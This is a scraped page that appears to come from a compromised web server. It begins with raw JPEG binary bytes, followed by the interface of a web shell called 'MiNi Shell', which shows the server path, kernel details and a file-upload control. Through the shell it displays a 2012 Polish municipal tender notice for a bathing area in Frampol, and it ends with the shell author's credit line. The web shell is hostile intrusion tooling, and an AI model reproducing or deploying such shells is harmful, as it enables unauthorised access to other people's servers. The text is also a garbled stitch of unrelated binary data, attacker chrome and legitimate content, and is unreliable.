JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120307/70846-N-2012.html

<p class="kh_header"><b>Frampol: Stworzenie nowego produktu  turystycznego Gminy Frampol poprzez urządzenie kąpieliska na zalewie we Frampolu wraz z infrastrukturą towarzyszącą.</b><br>
<b>Numer ogłoszenia: 70846 - 2012; data zamieszczenia: 07.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Frampola , ul. Radzięcka 8, 23-440 Frampol, woj. lubelskie, tel. 084 6857509 w. 38.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.frampol.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Stworzenie nowego produktu  turystycznego Gminy Frampol poprzez urządzenie kąpieliska na zalewie we Frampolu wraz z infrastrukturą towarzyszącą..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest stworzenie nowego produktu turystycznego Gminy Frampol poprzez  urządzenie kąpieliska na zalewie we Frampolu wraz z infrastrukturą  towarzyszącą.
 Przedmiot zamówienia obejmuje:
1) wybudowanie plaży poprzez wybranie części ziemi i nawiezienie nowego piasku;
2) postawienie gotowych kontenerowych natrysków i szaletów wraz z umywalkami oraz kontenera
     socjalnego dla ratownika;
3) zainstalowanie kolektorów słonecznych do podgrzewania wody użytkowej;
4) zamontowanie pomostów pływających wraz ze stanowiskiem dla ratownika z możliwością 
    cumowania niewielkich jednostek pływających jak łodzie, kajaki, rowery wodne;
5) wybudowanie wiaty na przechowywanie sprzętu wodnego;
6) budowę oświetlenia diodowego wzdłuż chodnika  i ścieżki rowerowej;
7) zakup sprzętu wodnego:
     a) łodzi motorowej dla ratownika - 1 szt.,
     b) kajaki 5 szt.,
     c) rowery wodne - 5 szt.,
      d) łodzie wiosłowe - 2 szt.,
      e) łódź żaglowa - 3 szt.
8) wykonanie przyłącza wodociągowego, kanalizacyjnego i energetycznego;
9) wybudowanie chodnika i ścieżki rowerowej stanowiącej połączenie drogi gminnej z zalewem;
10) wybudowanie parkingu dla 10 miejsc;
11) zamontowanie systemu zliczania pieszych i rowerzystów;
12) nagranie video przewodnika;
13) instalację Infokiosku;
14) instalację systemu zabezpieczeń na wypadek zagrożeń (pożarowych i
       przeciwwłamaniowych)
15) montaż monitoringu
16) ogrodzenie zaplecza,
17) Oznakowanie kąpieliska
  
    Zakłada się, że przedmiot zamówienia  będzie charakteryzował się długim okresem eksploatacji, zastosowane  technologie będą odpowiadać standardom obowiązującym w Unii Europejskiej poprzez zastosowanie  sprawdzonych, najlepszych i najnowocześniejszych technologii, materiałów i eksploatacji inwestycji  pozwalających  na długotrwałą i ekonomiczną eksploatację przedmiotu zamówienia.


Przedmiot zamówienia do wykonania zgodnie z :
1) Projektem budowlanym  wraz z infrastrukturą  do planu BIOZ- branża wodno- 
            melioracyjna;
2) Projektem budowlanym (branża budowlano- konstrukcyjna , drogowa, elektryczna, 
            sanitarna wraz z informacjami do planu BIOZ;
3) Operatem wodnoprawnym ;
4) Zestawieniem podstawowych parametrów technicznych elementów infrastruktury i 
            wyposażenia;
5) Specyfikacją techniczną  wykonania i odbioru robót (ogólną i szczegółowymi: wodno-melioracyjna, sanitarna, specyfikacja zakupów);
6) Specyfikacją techniczną  wykonania i odbioru robót(ogólną i szczegółowymi- branża 
            drogowa);
7) Specyfikacją techniczną  wykonania i odbioru robót (ogólną i szczegółowymi - branża elektryczna);
8) zasadami wiedzy technicznej;
9) SIWZ;
10) Umową;
11) Ofertą Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.24.20.00-5, 45.31.00.00-3, 45.11.12.00-0, 45.23.13.00-8, 45.23.31.23-7, 45.20.00.00-9, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający  żąda wniesienia przez Wykonawców  wadium. Wartość wadium została ustalona na kwotę 20.000,00zł( dwadzieścia tysięcy)
2. Wadium Wykonawcy winni wnieść przed upływem terminu składania ofert.
3. Wadium może być  wnoszone w jednej lub kilku formach:
      1) pieniądzu;
      2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
          kredytowej , z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
      3) gwarancjach bankowych;
      4) gwarancjach ubezpieczeniowych;
      5) poręczeniach udzielanych przez podmioty , o których mowa w art. 6 ust.5 pkt 2 ustawy z dnia 9 lipca 2000 r. o utworzeniu Polskiej Agencji Rozwoju        Przedsiębiorczości (Dz.U.Nr 109,poz. 1158 ze zm.)
4. Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy: w Banku  Spółdzielczym we Frampolu Nr 15 9604 00005 0000 0286 2000 0060.  Tytuł wpłaty: Wadium w przetargu  nieograniczonym na kąpielisko.
5. Za datę i godzinę wniesienia wadium w pieniądzu przyjmuje się datę i godzinę wpływu wadium na wskazany w pkt 4 rachunek bankowy. Uznanie konta Zamawiającego winno nastąpić najpóźniej  do dnia 22 marca 2012 roku do godz. 12.00.
6. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
7.  Wadium wnoszone w formach, o których mowa w pkt 3 ppkt 2, 3,4 i 5 musi wskazywać przedmiot zamówienia i zabezpieczać złożoną ofertę przez cały okres, na jaki Wykonawca jest związany ofertą. Dokument taki musi zawierać nieodwołalne i bezwarunkowe  zobowiązanie poręczyciela lub gwaranta  wypłacenia Zamawiającemu, na pierwsze jego żądanie, kwoty wadium, w przypadkach, o których mowa w pkt. 13 i w pkt 14. Dokument ten w oryginale może być dołączony do oferty lub może być złożony w oddzielnej kopercie, zawierającej dane Wykonawcy i napis  -Wadium w przetargu nieograniczonym na kąpielisko-  w  siedzibie  Zamawiającego - Sekretariat przed upływem terminu składania ofert, tj. najpóźniej do dnia 22 marca 2012r. do godz. 12.00.
8. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej  lub unieważnieniu postępowania, z wyjątkiem Wykonawcy , którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 13 i 14.
9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
 zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
10.  Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę  przed upływem terminu składnia ofert.
11.  Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę , któremu  
zwrócono wadium na podstawie pkt. 8, jeżeli  w wyniku rozstrzygnięcia odwołania jego 
oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium, w terminie 
określonym przez Zamawiającego.
12.  Wadium wniesione w pieniądzu ,Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego , na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
13.  Zamawiający zatrzymuje wadium  wraz z odsetkami, jeżeli Wykonawca:
 a) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył 
dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub 
pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego 
stronie;
14.  Zamawiający zatrzymuje wadium  wraz z odsetkami , jeżeli Wykonawca, którego oferta została wybrana :
1)  odmówił  podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Zamawiający dokona oceny spełniania warunków wymienionych w pkt.1 na podstawie żądanych w pkt.VI SIWZ dokumentów i oświadczeń, wg. Formuły ,,spełnia - nie spełnia.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony, jeżeli  Wykonawca wykaże, że:
-w okresie  ostatnich pięciu lat przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej
2 roboty budowlane , o wartości  co najmniej 500 000,00zł.(pięćset tysięcy) netto, każda robota budowlana.
Zamawiający dokona oceny spełniania warunków wymienionych w pkt.1 na podstawie żądanych w pkt.VI SIWZ dokumentów i oświadczeń, wg. Formuły ,,spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-warunek ten zostanie spełniony ,jeżeli Wykonawca do wykonania zamówienia 
zapewni:
a) co najmniej 1 osobę  posiadająca uprawnienia wymagane przepisami ustawy  
Prawo budowlane do pełnienia samodzielnych funkcji w budownictwie - kierowania robotami ogólnobudowlanymi z min. 3 letnią praktyką zawodową;
b) co najmniej 1 osobę  posiadająca uprawnienia wymagane przepisami ustawy  
Prawo budowlane do pełnienia samodzielnych funkcji w budownictwie - 
kierowania robotami budowlanymi  instalacji elektrycznych z min. 3 letnią praktyką zawodową;
c) co najmniej 1 osobę  posiadająca uprawnienia wymagane przepisami ustawy Prawo budowlane do pełnienia samodzielnych funkcji w budownictwie - kierowania robotami budowlanymi  instalacji sanitarnych z min. 3 letnią praktyką ;
d) co najmniej 1 osobę  posiadająca uprawnienia wymagane przepisami ustawy Prawo budowlane do pełnienia samodzielnych funkcji w budownictwie - kierowania robotami budowlanymi  drogowymi z min. 3 letnią praktyką.;
e) co najmniej 1 osobę  posiadająca uprawnienia wymagane przepisami ustawy 
 Prawo budowlane do pełnienia samodzielnych funkcji w budownictwie - 
kierowania robotami wodno-melioracyjnymi z min. 3 letnią praktyką.;
Zamawiający dokona oceny spełniania warunków wymienionych w pkt.1 na podstawie żądanych w pkt.VI SIWZ dokumentów i oświadczeń, wg. Formuły ,,spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony, jeżeli Wykonawca:
a)  posiada środki finansowe lub zdolność kredytową 
- w wysokości co najmniej 800 000,00zł.(osiemset tysięcy);
b) jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności i suma gwarancyjna wynosi co najmniej  1 200 000,00zł. (jeden milion dwieście tysięcy );
Zamawiający dokona oceny spełniania warunków wymienionych w pkt.1 na podstawie żądanych w pkt.VI SIWZ dokumentów i oświadczeń, wg. Formuły ,,spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany  postanowień umowy.                                              
 1.   Postanowienia Umowy mogą ulec zmianie  w zakresie:
1) terminu wykonania przedmiotu umowy  i pozostałych terminów określonych w Umowie:
- poprzez przedłużenie w sytuacji :
a)  gdy wystąpią okoliczności,  których nie można było przewidzieć, a które  mają istotny  wpływ na terminową realizację umowy,
b)  niedopełnienia przez  Zamawiającego  określonych w umowie należących do niego  
obowiązków,
c)  gdy zaistnieje konieczność przerwania lub zawieszenia robót z przyczyn 
niezawinionych przez Wykonawcę,
d) działania siły wyższej uniemożliwiającej realizację przedmiotu umowy,
-poprzez skrócenie w sytuacji gdy zostaną spełnione łącznie dwie przesłanki:
a)  Wykonawca wcześniej niż się się Strony umówiły w Umowie wykonana    
przedmiot umowy-i  Zamawiający uzna, że roboty zostały  zakończone i nie będzie miał
zastrzeżeń, co do kompletności i prawidłowości  dokumentacji powykonawczej,
b) Zamawiający będzie w stanie dokonać zapłaty wynagrodzenia Wykonawcy 
za  wcześniej wykonany przedmiot umowy;
2) wysokości wynagrodzenia Wykonawcy.
- w razie zaistnienia  okoliczności, których nie można było   przewidzieć  w chwili  składania Oferty i zawarcia Umowy, do których zalicza się tylko ustawową zmianę stawek podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.frampol.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski we Frampolu ul.Zamojska 13, 23-440 Frampol.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2012 godzina 12:00, miejsce: Urząd Miejski we Frampolu ul.Radziecka 8, 23-440 Frampol.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oś Priorytetowa VII. Kultura, turystyka i współpraca międzyregionalna. Działania 7.1. Infrastruktura kultury i turystyki. Kategorii III. Infrastruktura turystyki - projekty lokalne Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com